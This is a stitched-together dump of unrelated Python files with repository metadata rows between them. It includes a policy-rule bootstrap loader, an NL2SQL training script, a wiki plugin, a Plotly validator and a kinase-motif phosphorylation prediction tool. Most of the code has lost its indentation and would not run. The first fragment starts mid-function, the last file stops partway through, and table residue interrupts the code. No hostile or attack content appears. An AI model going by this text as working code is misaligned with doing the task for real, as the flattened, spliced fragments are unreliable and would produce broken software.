"""
Create the initial set of policy rules for the system.
        To establish clear rule precedence, deny all anonymous access to Org services first,
        then add rules which permit access to specific operations based on conditions.
"""
orgms_client = OrgManagementServiceProcessClient(process=calling_process)
policyms_client = PolicyManagementServiceProcessClient(process=calling_process)
ion_org = orgms_client.find_org()
system_actor = get_system_actor()
log.info('System actor: %s', system_actor._id)
sa_user_header = get_system_actor_header(system_actor)
policy_rules_filename = calling_process.CFG.get_safe("bootstrap.initial_policy_rules")
if not policy_rules_filename:
raise ContainerConfigError("Policy rules file not configured")
if not os.path.exists(policy_rules_filename):
raise ContainerConfigError("Policy rules file does not exist")
with open(policy_rules_filename, "r") as f:
policy_rules_yml = f.read()
policy_rules_cfg = yaml.safe_load(policy_rules_yml)
if "type" not in policy_rules_cfg or policy_rules_cfg["type"] != "scioncc_policy_rules":
raise ContainerConfigError("Invalid policy rules file content")
log.info("Loading %s policy rules", len(policy_rules_cfg["rules"]))
for rule_cfg in policy_rules_cfg["rules"]:
rule_name, policy_type, rule_desc = rule_cfg["name"], rule_cfg["policy_type"], rule_cfg.get("description", "")
if rule_cfg.get("enable") is False:
log.info("Policy rule %s disabled", rule_name)
continue
log.info("Loading policy rule %s (%s)", rule_name, policy_type)
rule_filename = rule_cfg["rule_def"]
if not os.path.isabs(rule_filename):
rule_filename = os.path.join(os.path.dirname(policy_rules_filename), rule_filename)
with open(rule_filename, "r") as f:
rule_def = f.read()
ordinal = rule_cfg.get("ordinal", 0)
# Create the policy
if policy_type == "common_service_access":
policyms_client.create_common_service_access_policy(rule_name, rule_desc, rule_def, ordinal=ordinal,
headers=sa_user_header)
elif policy_type == "service_access":
service_name = rule_cfg["service_name"]
policyms_client.create_service_access_policy(service_name, rule_name, rule_desc, rule_def,
ordinal=ordinal, headers=sa_user_header)
elif policy_type == "resource_access":
resource_type, resource_name = rule_cfg["resource_type"], rule_cfg["resource_name"]
res_ids, _ = calling_process.container.resource_registry.find_resources(
restype=resource_type, name=resource_name, id_only=True)
if res_ids:
resource_id = res_ids[0]
policyms_client.create_resource_access_policy(resource_id, rule_name, rule_desc, rule_def,
ordinal=ordinal, headers=sa_user_header)
else:
raise ContainerConfigError("Rule %s has invalid policy type: %s" % (rule_name, policy_type))
| 46.89899 | 122 | 0.647211 |
8cbccc07b49fdc8c4d54c69cf1b646e8841d507c | 4,514 | py | Python | train.py | hatrix233/nl2sql_baseline | e1dc59385932b325569f127df7b27e9fdb1d63da | [
"BSD-3-Clause"
] | 340 | 2019-06-10T09:49:39.000Z | 2022-03-19T16:17:49.000Z | train.py | hatrix233/nl2sql_baseline | e1dc59385932b325569f127df7b27e9fdb1d63da | [
"BSD-3-Clause"
] | 11 | 2019-06-10T12:31:48.000Z | 2021-04-25T01:40:09.000Z | train.py | hatrix233/nl2sql_baseline | e1dc59385932b325569f127df7b27e9fdb1d63da | [
"BSD-3-Clause"
] | 116 | 2019-06-10T09:40:40.000Z | 2021-10-09T07:30:53.000Z | import torch
from sqlnet.utils import *
from sqlnet.model.sqlnet import SQLNet
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--bs', type=int, default=16, help='Batch size')
parser.add_argument('--epoch', type=int, default=100, help='Epoch number')
parser.add_argument('--gpu', action='store_true', help='Whether use gpu to train')
parser.add_argument('--toy', action='store_true', help='If set, use small data for fast debugging')
parser.add_argument('--ca', action='store_true', help='Whether use column attention')
parser.add_argument('--train_emb', action='store_true', help='Train word embedding for SQLNet')
parser.add_argument('--restore', action='store_true', help='Whether restore trained model')
parser.add_argument('--logdir', type=str, default='', help='Path of save experiment log')
args = parser.parse_args()
n_word=300
if args.toy:
use_small=True
gpu=args.gpu
batch_size=16
else:
use_small=False
gpu=args.gpu
batch_size=args.bs
learning_rate = 1e-3
# load dataset
train_sql, train_table, train_db, dev_sql, dev_table, dev_db = load_dataset(use_small=use_small)
word_emb = load_word_emb('data/char_embedding')
model = SQLNet(word_emb, N_word=n_word, use_ca=args.ca, gpu=gpu, trainable_emb=args.train_emb)
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay=0)
if args.restore:
model_path= 'saved_model/best_model'
print "Loading trained model from %s" % model_path
model.load_state_dict(torch.load(model_path))
# used to record best score of each sub-task
best_sn, best_sc, best_sa, best_wn, best_wc, best_wo, best_wv, best_wr = 0, 0, 0, 0, 0, 0, 0, 0
best_sn_idx, best_sc_idx, best_sa_idx, best_wn_idx, best_wc_idx, best_wo_idx, best_wv_idx, best_wr_idx = 0, 0, 0, 0, 0, 0, 0, 0
best_lf, best_lf_idx = 0.0, 0
best_ex, best_ex_idx = 0.0, 0
print "#"*20+" Star to Train " + "#"*20
for i in range(args.epoch):
print 'Epoch %d'%(i+1)
# train on the train dataset
train_loss = epoch_train(model, optimizer, batch_size, train_sql, train_table)
# evaluate on the dev dataset
dev_acc = epoch_acc(model, batch_size, dev_sql, dev_table, dev_db)
# accuracy of each sub-task
print 'Sel-Num: %.3f, Sel-Col: %.3f, Sel-Agg: %.3f, W-Num: %.3f, W-Col: %.3f, W-Op: %.3f, W-Val: %.3f, W-Rel: %.3f'%(
dev_acc[0][0], dev_acc[0][1], dev_acc[0][2], dev_acc[0][3], dev_acc[0][4], dev_acc[0][5], dev_acc[0][6], dev_acc[0][7])
# save the best model
if dev_acc[1] > best_lf:
best_lf = dev_acc[1]
best_lf_idx = i + 1
torch.save(model.state_dict(), 'saved_model/best_model')
if dev_acc[2] > best_ex:
best_ex = dev_acc[2]
best_ex_idx = i + 1
# record the best score of each sub-task
if True:
if dev_acc[0][0] > best_sn:
best_sn = dev_acc[0][0]
best_sn_idx = i+1
if dev_acc[0][1] > best_sc:
best_sc = dev_acc[0][1]
best_sc_idx = i+1
if dev_acc[0][2] > best_sa:
best_sa = dev_acc[0][2]
best_sa_idx = i+1
if dev_acc[0][3] > best_wn:
best_wn = dev_acc[0][3]
best_wn_idx = i+1
if dev_acc[0][4] > best_wc:
best_wc = dev_acc[0][4]
best_wc_idx = i+1
if dev_acc[0][5] > best_wo:
best_wo = dev_acc[0][5]
best_wo_idx = i+1
if dev_acc[0][6] > best_wv:
best_wv = dev_acc[0][6]
best_wv_idx = i+1
if dev_acc[0][7] > best_wr:
best_wr = dev_acc[0][7]
best_wr_idx = i+1
print 'Train loss = %.3f' % train_loss
print 'Dev Logic Form Accuracy: %.3f, Execution Accuracy: %.3f' % (dev_acc[1], dev_acc[2])
print 'Best Logic Form: %.3f at epoch %d' % (best_lf, best_lf_idx)
print 'Best Execution: %.3f at epoch %d' % (best_ex, best_ex_idx)
if (i+1) % 10 == 0:
print 'Best val acc: %s\nOn epoch individually %s'%(
(best_sn, best_sc, best_sa, best_wn, best_wc, best_wo, best_wv),
(best_sn_idx, best_sc_idx, best_sa_idx, best_wn_idx, best_wc_idx, best_wo_idx, best_wv_idx))
| 44.693069 | 131 | 0.594152 |
74c6376ab1efa2f796963d42c0533079f995bf8b | 3,989 | py | Python | lib/yaki/plugins/_legacy/LatestEntries.py | rcarmo/yaki-tng | 9f1094bc8e359be881fb5ca19042f352b8c8d8a1 | [
"MIT"
] | 2 | 2015-12-21T02:24:13.000Z | 2016-03-08T06:45:58.000Z | lib/yaki/plugins/_legacy/LatestEntries.py | rcarmo/yaki-tng | 9f1094bc8e359be881fb5ca19042f352b8c8d8a1 | [
"MIT"
] | null | null | null | lib/yaki/plugins/_legacy/LatestEntries.py | rcarmo/yaki-tng | 9f1094bc8e359be881fb5ca19042f352b8c8d8a1 | [
"MIT"
] | 1 | 2015-07-19T22:10:51.000Z | 2015-07-19T22:10:51.000Z | #!/usr/bin/env python
# encoding: utf-8
"""
LatestEntries.py
Created by Rui Carmo on 2011-09-02.
Published under the MIT license.
"""
import re, md5, urlparse, time, cgi, traceback
import yaki.Engine, yaki.Store, yaki.Locale
from yaki.Utils import *
from yaki.Layout import *
from BeautifulSoup import *
class LatestBlogEntriesWikiPlugin(yaki.Plugins.WikiPlugin):
def __init__(self, registry, webapp):
registry.register('markup',self, 'plugin','LatestEntries')
self.webapp = webapp
self.ac = webapp.getContext()
self.i18n = yaki.Locale.i18n[self.ac.locale]
def run(self, serial, tag, tagname, pagename, soup, request, response):
ac = self.ac
c = request.getContext()
# define how many blog entries to show
try:
bound = int(tag['size'])
except:
bound = 3
# filter for the namespace we want
# TODO: this should be extensible to tags sometime in the future
try:
mask = re.compile(tag['src'])
except:
mask = re.compile('^(blog)\/(\d+){4}\/(\d+){2}\/(\d+){2}.*')
# this is what entries ought to look like, ideally
canon = "0000/00/00/0000"
# find entries.
# We use the indexer's allpages here because that's updated upon server start
# ...and because we want to do our own sorting anyway.
paths = [path for path in self.ac.indexer.allpages if mask.match(path)]
# canonize paths
entries = {}
for i in paths:
(prefix, path) = i.split("/",1)
l = len(path)
p = len(prefix)+1
k = len(canon)
# add an hex digest in case there are multiple entries at the same time
if l < k:
entries[i[p:l+p] + canon[-(k-l):] + md5.new(i).hexdigest()] = i
else:
entries[i[p:] + md5.new(i).hexdigest()] = i
latest = entries.keys()
latest.sort()
latest.reverse()
# skip over the latest entry
latest = latest[1:bound+1]
posts = []
for i in latest:
name = entries[i]
try:
page = ac.store.getRevision(name)
except IOError:
print "LatestBlogEntries: could not retrieve %s" % name
continue
headers = page.headers
path = ac.base + name
linkclass = "wikilink"
posttitle = headers['title']
rellink = path
permalink = headers['bookmark'] = request.getBaseURL() + rellink
if SANITIZE_TITLE_REGEX.match(name):
permalink = permalink + "#%s" % sanitizeTitle(posttitle)
description = "permanent link to this entry"
if 'x-link' in headers.keys():
link = uri = headers['x-link']
(schema,netloc,path,parameters,query,fragment) = urlparse.urlparse(uri)
if schema in self.i18n['uri_schemas'].keys():
linkclass = self.i18n['uri_schemas'][schema]['class']
description = "external link to %s" % cgi.escape(uri)
content = yaki.Engine.renderPage(self.ac,page)
try:
soup = BeautifulSoup(content)
# remove all funky markup
for unwanted in ['img','plugin','div','pre']:
[i.extract() for i in soup.findAll(unwanted)]
paragraphs = filter(lambda p: p.contents, soup.findAll('p'))
soup = paragraphs[0]
content = soup.renderContents().decode('utf-8')
# TODO: impose bound checks here and insert ellipsis if appropriate.
# the "Read More" links are added in the template below.
except Exception, e:
print "DEBUG: failed to trim content to first paragraph for entry %s, %s" % (name, e)
continue
postinfo = renderInfo(self.i18n,headers)
metadata = renderEntryMetaData(self.i18n,headers)
# Generate c.comments
formatComments(ac,request,name, True)
comments = c.comments
try:
tags = headers['tags']
except:
tags = ""
references = ''
posts.append(ac.templates['latest-entries'] % locals())
tag.replaceWith(''.join(posts))
| 34.991228 | 93 | 0.608172 |
a56faa1f02aed277b6d1fc63843fccca9476d17c | 454 | py | Python | plotly/validators/layout/polar/radialaxis/tickfont/_color.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | 2 | 2020-03-24T11:41:14.000Z | 2021-01-14T07:59:43.000Z | plotly/validators/layout/polar/radialaxis/tickfont/_color.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | null | null | null | plotly/validators/layout/polar/radialaxis/tickfont/_color.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | 4 | 2019-06-03T14:49:12.000Z | 2022-01-06T01:05:12.000Z | import _plotly_utils.basevalidators
class ColorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self,
plotly_name='color',
parent_name='layout.polar.radialaxis.tickfont',
**kwargs
):
super(ColorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='plot',
role='style',
**kwargs
)
| 23.894737 | 66 | 0.601322 |
40553a4390bc75b65582cc185c3ad91a886bbff8 | 55,994 | py | Python | Modified-PhosphoKin-LAMC1.py | AngelikiGal/Modified-PhosphoKin | f8f2b6f8f467a9f59cee43dac96ebd5198f2dc57 | [
"BSD-2-Clause"
] | 1 | 2020-10-07T14:21:11.000Z | 2020-10-07T14:21:11.000Z | Modified-PhosphoKin-LAMC1.py | AngelikiGal/Modified-PhosphoKin | f8f2b6f8f467a9f59cee43dac96ebd5198f2dc57 | [
"BSD-2-Clause"
] | null | null | null | Modified-PhosphoKin-LAMC1.py | AngelikiGal/Modified-PhosphoKin | f8f2b6f8f467a9f59cee43dac96ebd5198f2dc57 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
# 1st Function: Tool for searching kinase binding sites and potential phosphorylated residues in a protein.
# 2nd Function: This script also categorizes the phosphorylated residues according to their location relative to the protein's known active sites (inside of, close to within six residues proximity and outside of active sites).
# 3rd Function: This script also links kinases to active sites according to the phosphorylated residues they are responsible for and shows their activity inside of, close to and outside of active sites.
# 4th Function: This script finds the possibly responsible kinases for the experimentally observed phosphorylated residues in a protein according to kinases' binding motifs.
# 5th Function: This script identifies the missense point mutations that have been found in cancer patients and possibly disturb the predicted phosphorylation of the protein, by either preventing kinase binding or preventing the phosphorylation itself, according to kinases' motifs.
# Author: Panagiota-Aggeliki Galliou * (ag.gal.work@gmail.com)
# Author: Kleio-Maria Verrou (kleioverrou@yahoo.com)
# * to whom correspondence should be addressed.
## Copyright: © Copyright 2018+, Panagiota-Aggeliki Galliou, All rights reserved.
##License: This script follows the BSD License.
### Note: the kinase motifs are translated to regular expressions
#### Input: a Sequence.txt file, an Active_sites.txt file, an exp_phospho.txt file, a Motifs.txt file and a Mutation.xlsx file.
#### OUTPUT: Five output files; one for the 1st function (.txt file), one for the 2nd function (.txt file), one for the 3rd function (.txt file), one for the 4th function (.txt file) and one for the 5th function (.xls file).
# Edit: 29/6/2019 by Panagiota-Aggeliki Galliou (ag.gal.work@gmail.com)
## changes: -included important residues for kinases' motifs, -included recognizing missense point mutations from a file and matching them to the protein's active sites, kinases' binding sites and phosphorylations, identifying those mutations that possibly disturb the phosphorylation of the protein according to kinases' motifs either by changing an important residue for kinase binding or by changing the residue to be phosphorylated.
# Edit: 10/7/2019 by Panagiota-Aggeliki Galliou (ag.gal.work@gmail.com)
## changes: -included the Tyrosine Kinases and tyrosine phosphorylated residues. So the find_phospho_indexes_in_a_motif(motif) function was changed to identify pY as a phosphorylated residue in order to recognise the motifs of Tyrosine Kinases.
# Last Edit: 08/01/2020 by Panagiota-Aggeliki Galliou (ag.gal.work@gmail.com)
## changes: -changed the comments and the prints to contain more details and to be more specific,
"""
import re
import time
import sys
import os
import xlrd
import xlwt
import xlsxwriter
# ~ classes ~ #
## ~ ~ for input entries ~ ~ ##
class protein:
def __init__(self):
self.name = "" #name of the protein
self.type = "" #Kinase
self.motifs = [] # list of motifs the protein has. it takes motif objects
class motif:
def __init__(self):
self.regex = "" #regular expression of the motif
        self.pr=[] #it's an array. It holds numbers that show, counting from the beginning of the motif (position 0), at which position the kinase will phosphorylate. E.g. +0 means the kinase will phosphorylate the first recognized position in the motif, +1 the second, etc. So, for the motif [E/D]XXpS the value would be +3.
        self.ir=[] #it's an array. It holds numbers that show the important residues in the motif (the residues that are required in the protein sequence for the kinase to bind and phosphorylate there; basically, anything that is not an X (any amino acid)). The important residues are presented with numbers, which show the position of each important residue counting from the beginning of the motif (indexed as 0). So in a motif XXApS the values would be +2,+3.
## ~ ~ for result entries ~ ~ ##
class slim:
def __init__(self):
self.start = -1
self.end = -1
self.sequence = -1
self.phospho_res=[] #each element of the array shows the position of the residue that will be phosphorylated according to the motif
self.important_res=[] #the element of the array shows the position of each important residue according to the motif
class result_motif:
def __init__(self):
self.regex = ""
self.Slims = [] # the slims found for this motif. It takes slim objects.
self.M_slims=0 #counts the slims found for this motif. It is the len(Slims). The 0 value it has by default means that the Slims array is empty.
self.M_p_residues=[] #it has all the phosphorylated residues for this motif.
self.M_i_residues=[] #it has all the important residues for this motif.
class result_protein:
def __init__(self):
self.name = ""
self.type="" #Kinase
self.Motifs = []
self.total_slims= 0 #counts all the slims found for a kinase.
self.total_p_residues=[] #has all the phosphorylated residues for this kinase.
self.p_residues_inside=[] #has the residues in total_p_residues that are inside of active sites
self.p_residues_close=[] #has the residues in total_p_residues that are close within six residues proximity to active sites
self.p_residues_outside=[] #has the residues in total_p_residues that are outside of active sites
self.total_i_residues=[] #has all the importabt residues for this kinase.
self.i_residues_inside=[] #has the residues in total_i_residues that are inside of active sites
self.i_residues_close=[] #has the residues in total_i_residues that are close within six residues proximity to active sites
self.i_residues_outside=[] #has the residues in total_i_residues that are outside of active sites
class active_site:
def __init__(self):
self.start=0 #start of active site. Shows the position of the residue (eg 160).
self.end=0 #end of active site. Shows the position of the residue (eg 160).
class result_exp_phosph:
def __init__(self):
self.residue="" #is the residue that have been experimentally found to be phosphorylated
self.responsible_kinases=[] #The kinases that were predicted as possibly responsible for the phosphorylation of this residue. Takes result_kinase objects.
class AMutation():
def __init__(self, SampleID, CancerType, Mutation, FuncImpact, MutationType):
self.SampleID = SampleID
self.CancerType = CancerType
self.Mutation = Mutation
self.FuncImpact = FuncImpact
self.MutationType = MutationType
class result_mutation():
def __init__(self):
self.SampleID = ""
self.CancerType = ""
self.Mutation = ""
self.FuncImpact = ""
self.MutationType = ""
self.locationAS="" #location to active sites. Either inside, close or outside
self.AS = "" #which active site. In case the variable locationAS is inside or close this variable will have a value. in case lthe value of ocationAS is outside, the value of AS will be "-".
self.dPlaces=[] #a list holding all the motifs, slims, and kinases that this mutation disturbs.
class dPlace:
def __init__(self):
self.residue="" #either "phosphorylated residue" or "important residue" depending on whether the residue that the mutation distrubs is an important or a phosphorylated residue
self.kinase="" #the kinase that is disturbed by the mutation
# ~ END classes ~ #
# ~ functions ~ #
def get_sequence (filename):
## ~ ~ ~ Opens the Protein.txt file and gets protein sequence ~ ~ ~ ##
seq=""
protein_file= open(filename) # here you can put any protein sequence in fasta format
if protein_file:
print("Input file ",filename," opened.\n")
print("\n------------------------------------------------------------------\n")
for line in protein_file:
line=line.strip()
if ">" in line:
continue
else:
seq+=line
else:
raise IOError("Sequence file ",filename," could not open")
protein_file.close()
return seq
def get_exp_phosph_residues (filename):
exp_phosph=[] #an array to hold all the experimentally observed phosphorylations of the protein in a string format
string="" #buffer string
Exp_phosph_file= open(filename) # here you can put any txt file with the experimentally observed phosphorylation with a format: e.g. S13, T43, S145
if Exp_phosph_file:
print("Input file ",filename," opened.\n")
for line in Exp_phosph_file:
line=line.strip()
string+=line #get everything written in the file in a single string
else:
raise IOError("Sequence file ",filename," could not open")
Exp_phosph_file.close()
## edit the string to get the containing experimentally observed phosphorylated residues
buff=string.split(",")
## removing the whitespace characters from the start and end of the string and specifically the " " from the start of the string
for i in range(0,len(buff)):
buff[i]=buff[i].strip()
exp_phosph.append(buff[i])
return exp_phosph
def get_active_sites(filename):
active_sites=[] #an array to hold all the active_site objects
string="" #buffer string
AA_file= open(filename) # here you can put any txt file with the active sites of the protein with the following format: 15-22, 45-53, 63-74
if AA_file:
print("Input file ",filename," opened.\n")
for line in AA_file:
line=line.strip()
string+=line #get everything written in the file in a single string
else:
raise IOError("Sequence file ",filename," could not open")
AA_file.close()
## edit the string to get the containing active sites
buff=string.split(",")
## removing the whitespace characters from the start and end of the string and specifically the " " from the start of the string
for i in buff:
i=i.strip()
start,end=i.split("-")
active_sites.append(create_active_site(int(start),int(end)))
return active_sites
def get_motifs (filename):
kinases=[] #an array to hold all the protein objects
buff=[] #buffer contains in each position the motifs of each kinase
    M_file= open(filename) # here you can put any txt file with the kinases' binding motifs with the following format: e.g. H1K Kinase:[pS/pT]P[R/K]-[pS/pT]PX[R/K]-[R/K][pS/pT]P
if M_file:
print("Input file ",filename," opened.\n")
for line in M_file:
line=line.strip()
if (len(line)>0): #in case there are unnecessary new lines (enters) in the txt file
buff.append(line)
else:
raise IOError("Sequence file ",filename," could not open")
M_file.close()
## edit each element in the buffer to get the motifs of each kinase
for i in buff:
motifs=[] #an array to hold all the motif objects
protein, protein_motifs=i.split(":") #to split the protein name from the motifs of each kinase
protein=protein.strip()
protein=protein.split(" ")
if (len(protein)<1):
raise Exception("Protein name or protein type was not given correctly in ",i)
protein_name=protein[0].strip()
protein_type=protein[1].strip()
protein_motifs=protein_motifs.split("-") #to split the motifs of each kinase. protein_motifs acts as a buffer array that contains all the motifs of each kinase
for i in protein_motifs:
i=i.strip()
regex,pr,ir=find_phospho_indexes_in_a_motif(i)
motifs.append(create_motif(regex,pr,ir))
kinases.append(create_protein(protein_name,protein_type,motifs))
return kinases
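# Illustrative parse (the line below follows the format shown in the help prompt near
# the end of this script): the Motifs file line
#   ATM Kinase:pSQ-[P/L/I/M]X[L/I/E/D]pSQ-LpSQE
# yields protein_name="ATM", protein_type="Kinase" and three motif objects, each one
# converted to a regular expression by find_phospho_indexes_in_a_motif() below.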
def find_phospho_indexes_in_a_motif(motif):
#reads a motif and finds the residues to be phosphorylated. Also converts the motif into a regular expression.
nl = len(motif)
    ir = [] # list of indexes of important residues (including the phosphorylated ones) in the motif
    aS = [] #array that holds the allowed residue token(s) for each position of the motif.
ni = -1 #shows the current aminoacid of the aS element
ii = 0 #shows the current character of the input string
pr = [] # list of indexes of phosphorylated residues in the motif
while ii < nl-1: #check the whole string until one character before the last character
c = motif[ii] #current character
cn = motif[ii+1] #next character
if (c == "["): #if "["
ts = c
c = cn
ii += 1
while c != "]": # [pS*/pT*] #scan the string until the "]"
ts += c # save the characters before "]" into the ts string
ii += 1
c = motif[ii]
ts += c #save the "]" into the string
aS.append(ts) #append it to the aS
if "*" in ts: #if "*" in the ts just move on
ni += 1
elif ("p" in ts): #if "p" in the ts it means the position will be phosphorylated so append to pr
ni += 1
pr.append(ni)
else:
ni+=1 #just move on
ir.append(ni)
# ni -= 1
elif (c == "p"): #if "p" search the next character
if cn in "STY": #if "S" or "T" or "Y"
ni += 1
ii += 1
ts = c+cn #save the characters into a ts sting
ir.append(ni) #keep it in importand residues
if (ii<nl-1) and (motif[ii+1]=="*"): #-- check if "*" which means that the residues should already be phosphoprylated for the kinase to bind, move on.
ts +="*"
ii +=1
else:
pr.append(ni) #If not "*" then its the residue to be phosphorylated so append in pr
aS.append(ts)
else: #else if not "[" or "p" then it is an amino acid
ni += 1
if not ('X' in c): # if it has a specific aminoacid then add it to ir
ir.append(ni)
aS.append(c) #just append to aS
ii += 1
if ii<nl: #check the last character of the string. this condition is true if the last character is "X" or an amino acid
c = motif[ii]
aS.append(c)
if not ('X' in c): # if it has a specific aminoacid then add it to ir
ni +=1
ir.append(ni)
#convert the array into a string for output and better handling
sret = ""
for ci in aS:
sret += ci
#replace certain characters of the string to convert the motif language into regular expressions.
sret = sret.replace("X", ".")
sret = sret.replace("/", ",")
sret = sret.replace("pS*", "S")
sret = sret.replace("pT*", "T")
sret = sret.replace("pY*", "Y")
sret = sret.replace("pS", "S")
sret = sret.replace("pT", "T")
sret = sret.replace("pY", "Y")
if len(pr) < 1:
raise Exception("A motif should show at least one residue to be phosphorylated.")
if len(ir) < 1:
raise Exception("A motif should show at least one important residue for binding.")
spr = []
for elem in pr:
spr.append(str(elem))
sir = []
for elem in ir:
sir.append(str(elem))
return sret, spr, sir
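# Worked examples (illustrative; indices are 0-based positions counted from the start of
# the motif and are returned as strings):
#   find_phospho_indexes_in_a_motif("XXApS")     -> ("..AS", ['3'], ['2', '3'])
#   find_phospho_indexes_in_a_motif("[E/D]XXpS") -> ("[E,D]..S", ['3'], ['0', '3'])
# i.e. the motif becomes a regular expression, the second element lists the position(s)
# to be phosphorylated and the third lists all residues required for kinase binding.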
def create_motif(regex,pr,ir):
#creates a motif object with values the given arguments.
    #the pr argument fills the pr value of the motif object and the ir argument fills the ir value of the motif object.
m=motif()
m.regex=regex
m.pr=pr
m.ir=ir
return m
def create_protein (name,the_type,motif_array):
#creates a protein objects with values the given arguments.
if (len(motif_array)>=1): # a protein must have at least one motif.
#create a protein element with a name, a type and the array with its motifs
p=protein()
p.name=name
p.type=the_type
p.motifs=motif_array
#return the protein element
else:
raise Exception("A protein should have at least one motif")
return p
def create_slim(seq,st,en,pr,ir):
    #pr argument corresponds to the phosphorylated indexes [counting from the beginning of the slim found].
    #ir argument corresponds to the important indexes [counting from the beginning of the slim found].
s=slim()
s.sequence=seq #shows the sequence of the slim
s.start=st #shows the location of residue in the start of the slim (found by re.finditer())
s.end=en #shows the location of residue in the end of the slim (found by re.finditer())
for pi in pr:
if(is_correct(s,int(pi))):
s.phospho_res.append(s.start+int(pi))
for ii in ir:
if(is_correct(s,int(ii))):
s.important_res.append(s.start+int(ii))
return s
def is_correct(s, index):
    #checks whether the slim's residue that the index points to falls out of the slim's limits.
status=""
if (s.start<=s.start+index<=s.end):
status="TRUE"
else: #out of slim limits
status="FALSE"
print("Index ", index, "out of slim limits for ", s.sequence, "!")
return status
def create_result_motif(regex,array):
rm=result_motif()
rm.regex=regex
rm.Slims=array
rm.M_slims=len(rm.Slims)
for i in rm.Slims:
for a in i.phospho_res:
rm.M_p_residues.append(a)
for i in rm.Slims:
for b in i.important_res:
rm.M_i_residues.append(b)
return rm
def create_result_protein(protein, motif_array):
rp=result_protein()
rp.name=protein.name
rp.type=protein.type
rp.Motifs=motif_array
for i in rp.Motifs:
rp.total_slims=rp.total_slims+i.M_slims
for a in i.M_p_residues:
rp.total_p_residues.append(a)
for b in i.M_i_residues:
rp.total_i_residues.append(b)
#convert to set to keep only the unique entries and then to list again for easier manipulation.
rp.total_p_residues=set(rp.total_p_residues)
rp.total_p_residues=list(rp.total_p_residues)
#sorting the list
rp.total_p_residues.sort()
#convert to set to keep only the unique entries and then to list again for easier manipulation.
rp.total_i_residues=set(rp.total_i_residues)
rp.total_i_residues=list(rp.total_i_residues)
#sorting the list
rp.total_i_residues.sort()
#print(rp.total_i_residues)
return rp
def create_active_site(st,en):
aa=active_site()
aa.start=st
aa.end=en
return aa
def create_result_exp_phosph(residue,responsible_kinases):
rexp=result_exp_phosph()
rexp.residue=residue
rexp.responsible_kinases=responsible_kinases
return rexp
def create_AMutation(SampleID, CancerType, Mutation, FuncImpact, MutationType):
mutation_entry = AMutation(SampleID, CancerType, Mutation, FuncImpact, MutationType)
return mutation_entry
def create_result_mutation(SampleID, CancerType, Mutation, FuncImpact, MutationType, locationAS, AS, dPlaces):
rm = result_mutation()
rm.SampleID=SampleID
rm.CancerType=CancerType
rm.FuncImpact=FuncImpact
rm.MutationType=MutationType
rm.Mutation=Mutation
rm.locationAS=locationAS
rm.AS=AS
rm.dPlaces=dPlaces
return rm
def create_dPlace(kinase, residue):
dp=dPlace()
dp.kinase=kinase
dp.residue=residue
return dp
def find_motifs_for_a_kinase(protein,sequence):
#finds all the motifs for a protein in a sequence
slim_array=[] #all the slims found for a motif
motifs_array=[] #all the motifs found for a protein
for a in protein.motifs: #for each motif in this protein
slim_buffer=re.findall(a.regex, sequence) #find the regular expression in the given sequence.
slim_buffer=set(slim_buffer) #convert it to a set to keep only the unique entries
slim_buffer=list(slim_buffer) # convert it to a list for easier manipulation
for x in slim_buffer:
for m in (re.finditer(x,sequence)):
st=m.start()+1 #start of the slim. +1 because list start from 0 but residues from 1.
en=m.end()+0 #end if the slim.
new_slim=create_slim(x,st,en,a.pr,a.ir) #creates an new slim object
slim_array.append(new_slim)
slim_buffer=[] #clear slim_buffer
new_result_motif=create_result_motif(a.regex, slim_array)
motifs_array.append(new_result_motif)
slim_array=[] #clear slim_array
new_result_protein=create_result_protein(protein,motifs_array)
motifs_array=[] #clear motif_array
return new_result_protein
def find_motifs_for_all_proteins(proteins_array, sequence):
#finds all motifs of all proteins that are included in a protein_array in a sequence. Returns a Results array with all the results
Results=[] #has all the result_protein objects.
for i in proteins_array:
Results.append(find_motifs_for_a_kinase(i,sequence))
return Results
def merge_phospho_residues(Results) :
#merges the total_p_residues arrays of all result_protein objects that are included in the Results array on a single list. Returns that list.
All_phospho_residues=[]
for a in Results:
for b in a.total_p_residues:
All_phospho_residues.append(b)
#convert to set to keep only the unique entries and then to list for easier manipulation
All_phospho_residues=set(All_phospho_residues)
All_phospho_residues=list(All_phospho_residues)
All_phospho_residues.sort() #sorting
return All_phospho_residues
def merge_important_residues(Results) :
    #merges the total_i_residues arrays of all result_protein objects that are included in the Results array into a single list. Returns that list.
All_important_residues=[]
for a in Results:
for b in a.total_i_residues:
All_important_residues.append(b)
#convert to set to keep only the unique entries and then to list for easier manipulation
All_important_residues=set(All_important_residues)
All_important_residues=list(All_important_residues)
All_important_residues.sort() #sorting
return All_important_residues
def assign_residues(array,sequence):
    #gets an array with the positions of residues and returns an array with the residues and their positions (e.g. S4)
return_array=[]
for i in range (0, len(array)):
index=array[i]
residue=sequence[index-1]
return_array.append(str(residue)+str(index))
return return_array
def de_assign_residues (array):
    #separates the position from the residue. It takes an array with values e.g. S231 and returns 231.
return_array=[]
for i in array:
return_array.append(int(i[1:]))
return return_array
def print_results(Results,protein_name,protein_sequence,inside,close,outside,Results_Exp_phosphp,Exp_Inside,Exp_Close,Exp_Outside):
# ~ ~ for the first output file ~ ~
outputname=protein_name+"-Kinases_Motifs.txt"
with open (outputname, "w") as output:
if output:
print("\nFile ",outputname, "created.\n")
underscore="_________________________________________________________________________________"
dashes="-------------------------------------------------------------"
All_phospho_residues=merge_phospho_residues(Results)
All_important_residues=merge_important_residues(Results)
All_phospho_residues_with_AA=assign_residues(All_phospho_residues,protein_sequence)
output.write("{:s}".format(underscore))
output.write("\nAll phosphorylated residues predicted for {:s}: (Total={:d})\n".format(protein_name,len(All_phospho_residues)))
output.write(str(All_phospho_residues))
#output.write("{:d}\n".format(All_phospho_residues))
output.write("\n{:s}\n".format("or (with assigned residues:)"))
for i in All_phospho_residues_with_AA:
output.write("{:s}, ".format(i))
output.write("\n{:s}\n".format(underscore))
output.write("{:s}".format(underscore))
